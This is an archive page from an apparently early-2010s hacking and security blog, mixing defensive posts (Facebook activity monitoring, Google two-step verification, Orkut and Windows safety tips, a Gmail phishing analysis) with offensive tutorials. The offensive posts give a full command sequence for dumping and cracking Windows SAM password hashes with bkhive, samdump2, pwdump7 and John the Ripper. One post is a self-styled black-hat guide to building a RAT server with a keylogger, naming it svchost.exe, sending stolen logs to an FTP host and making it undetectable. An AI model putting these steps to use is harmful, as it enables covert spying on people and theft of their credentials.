Results for Password

Ramnit : Worm that loves Facebook

Friday, January 20, 2012
ramnit malware
 "Ramnit"  the worm with multifaceted spreading capabilities,first detected on 2010 for infecting local systems. Now the hackers behind it have redesigned it into a more advanced kind of worm.The worm has already stolen 45000 facebook credentials and still on move.





It is also confirmed that this worm is able to bypass the two level authentication used by banking organizations and online money transfer.Below I have taken the snapshot of the code of the worm that was detected in 2010.
 It comes from online malicious sources and   creates infected .html files through that it infects the executable and .dll files. As,depicted in the video below.





But as the worm has spread its root to financial and social media so it a big concern.Users are advised to change there credentials in every 14 days.
Ramnit : Worm that loves Facebook Ramnit : Worm that loves Facebook Reviewed by Satyajit (Admins,a.k.a Satosys) on Friday, January 20, 2012 Rating: 5

Monitor Facebook activity and increase Security

Monday, January 03, 2011
Facebook is one of the most widely used social networking site these days.So,if your account get compromised in any way for example by session hijacking etc then it may result in a big headache.Here in this post i will tell you how you can monitor your account activity details like location,OS type and time of access.

Read the  post on "Facebook security and privacy tips".

Procedure:

Step 1.
Click on the "Account" on the upper right side of the your facebook page and then click on the "Account settings" as shown in the image below.

If you find this post interesting then subscribe here to get updates.

 Step 2.
Now scroll down to where you see "Account Security" and click on change option there as shown in the image below.
Step 3.
Now you can see the recent activity and other activities in the past.There also you can see the "Login Notification" option,I would recommend to set it "On" to add an extra level of security.In the next login attempt you will be asked your computer name so,provide the desirable name and click on continue.
Step 4.
If you suspect any unfamiliar device or location based on your activity history then you can click on the "End activity" option to end that activity.

Note:The information furnished in the account activity in not that detail but it can certainly add a level of security to your facebook account.
Monitor Facebook activity and increase Security Monitor Facebook activity and increase Security Reviewed by Satyajit (Admins,a.k.a Satosys) on Monday, January 03, 2011 Rating: 5

Prevent access to Google Apps and reset sign-in cookies.

Sunday, January 02, 2011
Google Apps has indeed added a bit of ease to most of the people those who are on move,they can access there favourite google service from anywhere any time if they have access to internet.Suppose the device from where they are accessing the Google Apps account get stolen then the person possessing the device can open their account using the session cookies present in the browser without even knowing the authentication credentials(username & password).

Google really thinks about its user's security so,it has added a feature to reset the session sign-in cookies for a
particular user and that user needs new authentication to sign-in.

Note:This feature is only available to premier users(paid user) of the account

Step 1.
Login(As Administrator) in to the control panel of your Google Apps account and reach the dashboard as shown below.The control panel can be accessed from the link below.
( http://www.google.com/a/your-domain_name.com )

Step 2.
To avail this feature you need to have the "Next generation control panel".To do this follow the instructions shown in the image below.
Step 3.
Now click on the "Organisation and users" tab and click on the desired username for whom you want to reset the sign-in cookies as shown in the image below.
Step 4.
Now "User information" open up and you can see the "Reset sign-in cookies" option in the password section.Just click on it then the user has to re-authenticate again when they start a new browser session.

To remote wipe a mobile device visit here.
Prevent access to Google Apps and reset sign-in cookies. Prevent access to Google Apps and reset sign-in cookies. Reviewed by Satyajit (Admins,a.k.a Satosys) on Sunday, January 02, 2011 Rating: 5

Retrieve Windows password using Samdump2 and John with Backtrack4

Thursday, December 30, 2010
Earlier I posted on "How to hack Windows administrator password" using backtrack.This post is the final post of it where we will see how we can retrieve the password without reseting it.

Here I will be using Backtrack4 and boot it from USB but you can also boot it from a CD.

Requirements:

1.Backtrack 4.iso (Download)

2.UseNetbootin (Download)

If you have any problem in installing backtrack in your usb then read here.

Procedure:

Step 1.
Having made a bootable usb now reboot the system and boot Backtrack4.Use username:root and password:toor and use startx

Step 2.
Now open up the console window to type the command "df"(Disk free) or fdisk -l to find the drive where you can find the SAM file of your Windows box.Here i will be using "df".
Step 3.
If you find the desired drive in the above step then its ok,if not then you can mount it by using the command mount -t ntfs /dev/sda1 /mnt/sda1 -o force (Here force you may not use).

Step 4.
As we know that SAM file of windows there in config directory of system32.So we need to be in that directory to do our further work.Type in the command cd /mnt/sda1/WINDOWS/system32/config (Mark the "WINDOWS" in the command is in caps on).

Step 5.
Now use bkhive to get a key file to be used in further steps by typing in the command
bkhive system ~/Desktop/key.txt  here "~/Desktop/key.txt" is the path of the key file to be created.Having executed the command you can check your desktop if the file has been created.

Step 6.
Here we will be using samdump2 for dumping the hashes by using the key file created in the previous step.The command format is samdump2 [samhive path] [keyfile path].So the command to be used here is samdump2 SAM ~/Desktop/key.txt > ~/Desktop/SHunk_Hash.txt  here "~/Desktop/SHunk_Hash.txt" is the path where the hashes from the SAM file will be copied which can be copied.You can check the desktop for the Shunk_Hash.txt file.
Step 7.
In order to view the hash,type in the command cat ~/Desktop/SHunk_Hash.txt as shown below.
Step 8.
Now change the directory to /pentest/password/jtr or simply type "john" you will see the directory has been changed to the desired one.

Step 9.
Now type in ./john ~/Desktop/SHunk_Hash.txt here the john the ripper will search for all the passwords but you can limit it by using ./john ~/Desktop/SHunk_Hash.txt -users=[Desired username without braces].Here "~/Desktop/SHunk_Hash.txt" is the path of the hash file that we created in the previous step.
Command Summary:

1.df

2.mount -t ntfs /dev/sda1 /mnt/sda1 -o force (Optional)

3.cd /mnt/sda1/WINDOWS/system32/config

4.bkhive system ~/Desktop/key.txt

5.samdump2 SAM ~/Desktop/key.txt > ~/Desktop/SHunk_Hash.txt

6.cat ~/Desktop/SHunk_Hash.txt(Optional)

7.cd /pentest/password/jtr

8../john ~/Desktop/SHunk_Hash.txt

OR

./john ~/Desktop/SHunk_Hash.txt -users=[Desired username without braces]
Retrieve Windows password using Samdump2 and John with Backtrack4 Retrieve Windows password using Samdump2 and John with Backtrack4 Reviewed by Satyajit (Admins,a.k.a Satosys) on Thursday, December 30, 2010 Rating: 5

How to use John the Ripper Tutorial and Pwdump7

Wednesday, October 20, 2010
In Microsoft Windows user account password and information are stored in a file called SAM. The windows SAM file location is “%systemroot%\system32\config” and also a backup copy of the file is also stored in ”%systemroot%\repair”.Here in this post we will see how to use John the Ripper for windows to extract the information.

As part of Windows 10 Password hack, we will be using brute force password cracker that is John the Ripper and Pwdump7.In this John the Ripper tutorial we will keep things simple for understanding and keeping in mind if any beginner is following it.
SAM-Password-cracking

In Windows 10 and earlier versions till Windows SP3 the SAM file is by default locked with syskey enabled so we cannot open it as such and view its content so here in this post, I will show you how we can crack it and retrieve the hash.

You may be wondering what does SAM stand for?

It is can be expanded as Security Accounts Manager, it stores the user credentials information.

Requirements:

1. Pwdump7: (Download)

2.John the ripper Download

Procedure:

Step 1. You need to have the administrative privilege then open up command prompt window, using the command prompt go to the directory where pwdump7 is present and follow the on-screen information as shown below.
SAM-Password-cracking

Step 2. After all the hashes are being displayed on the command prompt screen right click on the title bar copy it then pastes and saves it in a text file.First right click and mark the screen before copying. Here I have saved it as pw-hash.txt
SAM-Password-cracking

Step 3.Having downloaded John the ripper for windows browse into John’s root directory and use the command as shown in the image below.
SAM-Password-cracking

Step 4.The command we have used above is “C:\JOHN\RUN>john-386 C:/pw-hash.txt –users=Administrator”, the format of the command is “john-386 [Hash file path] –users=[Username]”.Here the hash file path is “C:/pw-hash.txt” and the username is “Administrator”, by using the above command then the John will search for the password of Administrator.

You can also use “C:\JOHN\RUN>john-386 C:/pw-hash.txt” so that John will search for the password of all the usernames available.

If you have a John the ripper wordlist then you can use the wordlist mode as well.

john --wordlist=password.txt pw-hash.txt

I think from this post we were able to understand how to use John the Ripper for windows Tutorial and Pwdump7 .

If you find this post useful then do drop a comment it will be appreciated.
How to use John the Ripper Tutorial and Pwdump7 How to use John the Ripper Tutorial and Pwdump7 Reviewed by Satyajit (Admins,a.k.a Satosys) on Wednesday, October 20, 2010 Rating: 5

More Secure is Google Account -Two Step Authentication.

Monday, October 04, 2010
Google has planned for the first time to introduce "A Two-Step Authentication/Verification" for logging into google account.It is really a very innovative way where maximum security can be ensured to the users.

This new feature will be first available to Google Apps Premiere, Education, and Government edition customers and then this will be brought to all the users who are not using Google applications....isn't it cool.. :)

What is Two-Step Authentication?
Image source:http://techcrunch.com/
As you can see the above screen shot,there are two verification mode.The first one is the login screen where the user has to enter his/her password then the next screen is another verification screen where the user has to enter a code generated from a mobile application etc.This feature will be first available to Google application loaded mobiles.If every thing goes fine then the user will be logged in.

How to get the Verification code?

The Verification code can be obtained by 3 ways

1.
From "Google Authenticator" application loaded in Android, the iPhone, and Blackberry etc.


2.From SMS message

3.Or through Voice call
Image source:http://techcrunch.com/
 
Why this is more Secure?

Certainly this is more secure than any other login process.What happens in our normal online account is that we have to enter the username along with the password to gain access but here along with that there an extra step of entering a six digit code to gain access.So if anyone lose his/her password by phishing or certain scam still then the account is secure since the six digit code is needed  for logging in.

This new feature will be available to all the google account users in the next few months.... :)
More Secure is Google Account -Two Step Authentication. More Secure is Google Account -Two Step Authentication. Reviewed by Satyajit (Admins,a.k.a Satosys) on Monday, October 04, 2010 Rating: 5

New Gmail Phishing scam on roll.

Wednesday, September 15, 2010
Gmail is again hit by a new phishing scam, which is warned by the Security researchers from Sunbelt.This is almost similar to the old phishing scam that is using a spoof page(a.k.a fake page) along with the blend of social engineering inorder to fool the users.Dont know what is phishing visit here.

What is new about this scam?

As i mentioned earlier that it is almost similar to the old one but the only striking difference is that it has got an attachment along with a mail.The attacker has used the skills of social engineering to make the user believe that the mail is from the "GOOGLE" itself.Take a look at the mail below......
(Source:Sunbelt.blogspot.com)
The attach file is in Html format called as Gmail_access.html,which is a fake page of Gmail login page having  all the elements and graphics exactly similar to the original page.Take a look at the image below.
(Source:Sunbelt.blogspot.com)
How it Works?

Check the source code of the attachment(html file),use ctrl + f  to find "action=" use without quotes then u will find something different to that of the original page.

action="http://www.wtwener.com/e107_themes/serviceloginAuth.php"

which means when the user enter any values in the login field of the fake page(attachment) then it sends the values to a "serviceloginAuth.php" on an external domain for the attacker and the website under this domain is registered to someone in Sremska Kamenica, Serbia-said Tom Kelchner of sunbelt.

(Credits:sunbelt.blogspot.com)

If you find this post worth reading then do drop a comment ,it will be appreciated .
New Gmail Phishing scam on roll. New Gmail Phishing  scam on roll. Reviewed by Satyajit (Admins,a.k.a Satosys) on Wednesday, September 15, 2010 Rating: 5

Few Security Tips for Windows user.

Saturday, September 11, 2010
Well!! security is the buzzing word these days because of new form of  attacks and threats.These attacks are mainly targeted to Windows user compared to Linux or other OS in the series.One thing I must say that 90% of the victims fall in the trap of attackers due to there lack of alertness and there own flaws.Lets see how we can avoid these types of attacks if not completely but to some extent.

1.I would recommend that always update your OS and software that are installed if the update is available.If  you do not do that then there may be some vulnerability in your present OS or software and the attacker can find that by Fingerprinting and Banner grabbing and plant an exploit for it.

2.Attacker  install R.A.T or Keylogger on a remote PC by tricking the user by social engineering.So I will recommend you to always look out for the extension of the file before clicking on it.It may sometime be the case that the file sent to you may look like an image but having an extension of an executable format(.exe).How to tackle it? Read here.

3.Always use an updated AntiVirus,Anti-Logger,Link Checker,Site Advisor and keep with you a latest rescue disk of an Antivirus.
  • Anti-logger:I would recommend  Zemana antilogger compared to KeyScrambler because the later can protect your keystrokes from the browser window but Zemana has anti-keylogger,anti-screen logger,anti-webcam logger,anti-clipboard logger.
  • Link Checker:You can use Dr.Web link checker,by this you can scan a file before downloading it.Just right click on the required link and click on the Dr.web icon.It is also available as a Firefox addon.
  • Site Advisor:Here you have two options,you can use Macfee site advisor or WOT both can be integrated with your browser.
  • Rescue Disk:I would recommend using Kaspersky's.Download the .iso file and burn it into a Cd and can use it.
4.If  sometime you have left your PC  "ON"  in your absence then it may be possible that someone may have plugged in an USB (Pendirve) and done some data transfer or some unethical activity.Read here how to find out this.

5.Most of the time attackers bind a file with another file inorder to trick the victim.Learn how to find this,Read here.

6.A simple Autorun.inf can even crash your PC.Learn how to avoid it,Read here.

7.Have you ever given a thought that someone may have logged into your box in your absence.Learn how to find out,Read here.

8.Always look out for print and file sharing option before using internet.I would recommend to disable it as it can open gateway for netbios attack.Follow the path  Control panel > Network Connection > Right click on the desired icon >Networking Tab > Disable the print & file sharing option.

9.Always use a strong password to your administration account,try to access internet form a limited user account rather than from administration account.

10.Use a good firewall rather than using the default windows firewall,you can choose from Comodo or Zone Alarm but I would recommend using Zone Alarm even if it is the free version.

I must say even if you follow all these tips still then you cannot make your PC 100% hack proof because nothing is non-hackable.I recommend to follow these tips so that you can avoid certain attacks or threats to some extent.

If you find these tips helpful and read worthy then do drop a comment,it will be appreciated.
Few Security Tips for Windows user. Few Security Tips for Windows user. Reviewed by Satyajit (Admins,a.k.a Satosys) on Saturday, September 11, 2010 Rating: 5

How to Spy a Remote PC using RATS ?(General Tutorial)

Monday, July 26, 2010
Note: Earlier CompufreakS.blogspot.com is now SECURITYHUNK.

Spying on Remote PC can be done in many ways....but today we are going to see how it can be done using RATS(Remote Administration Tools).This tutorial is a general one which can be followed for installing server of all types of RATS.Only thing that you have to notice are the terms associated and data that are to be filled.
RATS
This is a Black Hat Tutorial so I would suggest my readers to go through the DISCLAIMER before reading the tutorial.

For carrying out this attack you will need......

a)A Remote Administration Tool (Here i will be using Spy Net2.7Beta)

b)A FTP service and a host under No-Ip.com (How to?....Read here )

Note:Click on the images to Zoom them.
 So lets start......

1.First download the RAT,here i will use Spy Net 2.7Beta.
Purposefully I have not given the download  link,you can take the help of our best friend.... "Google"

2.Run it and click the "START  BUTTON"select your suitable language as shown in the image below.

3.Then click on "CREATE SERVER " and give a suitable name to it as shown in the image below.

4.After step 3. a user with the desired name has been created,now select that and click on "FORWARD"as shown in the image below.

5.Now you will be guided to the server installation process,so fill in the details as shown in the image below...inorder to know  how to fill  read this.


6.After that hop up to the next tab and fill that excatly as show in the image below,i have chosen "svchost.exe" as these are found in multiple in  MS boxes..... lol.

7.The next tab is the message...which means if  you enable this then that message will pop-up when the server is run on the victim's computer,here I am not using it.

8.Then open up the keylogger tab and fillup as shown below but in step 2. fill as said  described here.

9.Now hop up to "Create server" tab and fill as shown in the image below.

10.Now since the server is ready so make it FUD(Fully UnDetectable) by using crypter and you may bind it to some other file using a binder and scan it with novirusthanks.org(do not click on distribute option.)This part will be covered in detail my later post.

For Countermeasures read from below.....



( RATS:Remote Administration Tools & Spying on Remote PC )


If you find this post worth reading do drop a comment it will be appreciated...... :)

This is black hat tutorial is for Educational purpose,Compufreaks condemns black hat.(Disclaimer).

IF YOU LIKED THE CONTENT OF THIS BLOG THEN DO "VOTE" FOR IT........Click here to Vote!
How to Spy a Remote PC using RATS ?(General Tutorial) How  to Spy a Remote PC  using  RATS ?(General Tutorial) Reviewed by Satyajit (Admins,a.k.a Satosys) on Monday, July 26, 2010 Rating: 5

RATS:Remote Administration Tools & Spying on Remote PC

Friday, July 23, 2010
Have you ever noticed your CD/DVD drive ejecting automatically,Taskmanager showing error,folder options not working,Anti-Virus crippled ,Unkown listening ports,unwanted messages poping up or windows restarting on its own?.....lol then its a great worry for you because you are infected by trojan(RATs) and someone may be spying on you...lol.


What are RATs?
Remote Administration Tools/Remote Administration Trojans are abbreviated as RATS.These are also called as backdoor  tools because they enter to the box of the victim with out his knowledge just like a  a thief enters our house without our knowledge so,the name backdoor is assigned to it.Once the tool is installed on the victim's box  then the attacker has full or administrative privileges over it,by it i mean to say the attacker can do all the tasks that the victim himself  does in his box.

Tasks performed by  RATs.

1.Screen logging,Keylogging,Web logging,Clipboard logging.

2.File control

3.Registry control

4.PC control.(Format the hard disk,Shut down/Restart the PC,Lock the PC )

5.and other application related functions.

Now i feel you all are quite familiar with the functionality of RATS.
So,lets discuss few fundamentals......
Note:Click on the images to zoom them.
1.A RAT has two part  ie. a client and a server.The server is  installed in the victim's box and client part is used by the attacker.

2.A FTP(File Transfer Protocol) service is needed.Lets see how to get that.....
I would recommend to use  http://www.drivehq.comFirst sign-up to it.

In the FTP services settings of RATs  the url used is http://ftp.drivehq.com. and the "Username" and "Password" is same as that used during sign-up to drivehq.com
The data stolen by the RAT is stored in the log folder as mentioned in the image so, the same "log" directory has to be mentioned in the FTP settings of the RAT while installing the server.

3.For installing a server few RATS require a Dynamic service. I would recommend to use No-IP.Com
and setup a host in it as shown in the image below.

After Sign-up then a host is added as shown in the image below.


A  desktop client called  "No-IP DUC" is to be used to keep track of the updates.(Download)

4.Lastly after the server is ready a Binder and Crypter is needed to make it Full UnDetectable(FUD).This portion will be covered in detail in my later posts.


COUNTERMEASURES:

1.An  Anti-logger is must,i would recommend "ZEMANA" anti-logger.
2.Use a good firewall,i would recommend "ZoneAlarm" and Anti-virus I use Avira premium security suite,which is the best.

3.When testing RATS  use it in a virtual environment like Sandoxie , Virtual Box , VMware.

4.Look out for unwanted open ports.To see it open up command prompt and type in
"netstat -a -o -n",the ports those are marked "Listening" are open.There are few ports which are for particular type of Trojans.(DOWNLOAD)  the list.

5.Scan a file with Dr.Web Link Checker before downloading.

6.A file less than 20mb can be scanned online with Multi-Engine Anti-Virus  provided by  noVirusthanks.org

I hope this will help you to get  a fundamental idea about RATS.
If you find this worth reading then do drop a comment,it will be appreciated..... :)

IF YOU FIND THIS BLOG WORTH READING THEN DO "VOTE" FOR IT........Click here to Vote!
RATS:Remote Administration Tools & Spying on Remote PC RATS:Remote Administration Tools & Spying on Remote PC Reviewed by Satyajit (Admins,a.k.a Satosys) on Friday, July 23, 2010 Rating: 5

How to protect your ORKUT account from being Hacked....?

Friday, July 16, 2010
"Orkut" is  the social networking site powered by  Google.Most of the attackers nowadays use orkut  for advertising there work and product through the victim's account.I have come across few incidents where accounts are being  hacked then some pornographic content and vulgar language are displayed this can surely cause nightmare to the user,if  the user is using  the primary email account for logging  into orkut then he/she is in double trouble.Actually hacking orkut does not need  any elite skills but the attackers mainly exploit the  human awareness and intelligence(Social engineering) in doing so.

Today in my post i am going to discuss how to protect the orkut account from being hacked.

Note:Click on the images to zoom them.

1.Always look out for  Https(Hypertext Transfer Protocol Secure) instead of Http(Hypertext Transfer Protocol) in the url bar before loggin in and if you are using Mozilla Firefox  or IE  look out for a "Lock" sign  in the bottom right corner as orkut uses SSL(Secure Sockets Layer)  certificates in encrypting data as shown in the image below.

2.Fake login pages(Phishing) can be a trap for you as they look exactly like the original  login page.
For example: http://orkut420.t35.com/Orkut.htm  if the attacker is more creative then  he/she can manipulate the url and make it look in a way that can create illusion For example:Orkkut.com,Okrut.com,Orrkut.com,Orcut.com etc.  lol , so i will suggest  you to always type in the url before logging in.If  you find a phishing site then add it to Phish Tank.To know how this attack is carried out visit here.Below i have shown the image of a fake login page that i have made.

3.Always stay away from clicking on suspicious Community links beacause they can be Malware or Cookie grabbers.The attacker sometimes uses words and phrases that lure users and attract them to click on it, in that way they give away there password after being redirected to a fake login page.

4.Keylogging is also a major factor in hacking into orkut  account.In one of my post i have described about  keyloggers.By using this tool the attacker can  keep a track of the keystrokes of the user.You can prevent this by  using key strokes encryption  software like Key Scrambler or Zemana.I would recommend Zemana.Key scrambler also available as a addon to IE and Firefox.

5.Stay away from Java Scripts that promise to give some amazing outcome upon pasting it to  url bar.and hitting enter.Never ever do that ,it is a trap used few years back but i feel people are aware of it now.

6.Never ever use your primary email account with Orkut because if your account is hacked at the same time you will  also lose your email account also.So,i will suggest to use another secondary email account for your Orkut sign-up.It could be the other way round that is the attacker can hack your email account then he/she can hack into your Orkut account,learn  "Common email hacking methods and Countermeasures".
 
7.Never get carried away by the false promises or advertisements sent to you for example free easy recharge of mobile phones.Never click on these types of links

8.Never ever enable the "Remember me" option while login to your account.Because by doing that the password get stored in the browser and can be retrieved by Password stealers or RATS or Backdoors or Trojans.

9.Stay away from using  Glittering , Picture scrap scripts and Themes of Orkut profile showing different film stars available in different  unofficial sites because some  hidden malware  or malicious script may be there.Using it may result in grabbing your password and in that way you may lose your password.As shown in the image below.

10.Always logout from your account after you have finished your work if you are in a public computer like in college or office,it is very important because  if you do not  do that some person logging in after you may do mischievous work with your account.

Note: Always use a good updated Anti-Virus,Recent version browser,Safe browsing tools like:WOT or Mcafee siteadvisor and a Anti-Keylogger like Key Scrambler or Zemana

If  you find this post a bit worthy to read so do drop a comment,it will be appreciated.... :)

IF YOU FIND THIS BLOG WORTH READING THEN DO "VOTE" FOR IT........Click here to Vote!
How to protect your ORKUT account from being Hacked....? How  to  protect  your  ORKUT  account  from  being  Hacked....? Reviewed by Satyajit (Admins,a.k.a Satosys) on Friday, July 16, 2010 Rating: 5
Powered by Blogger.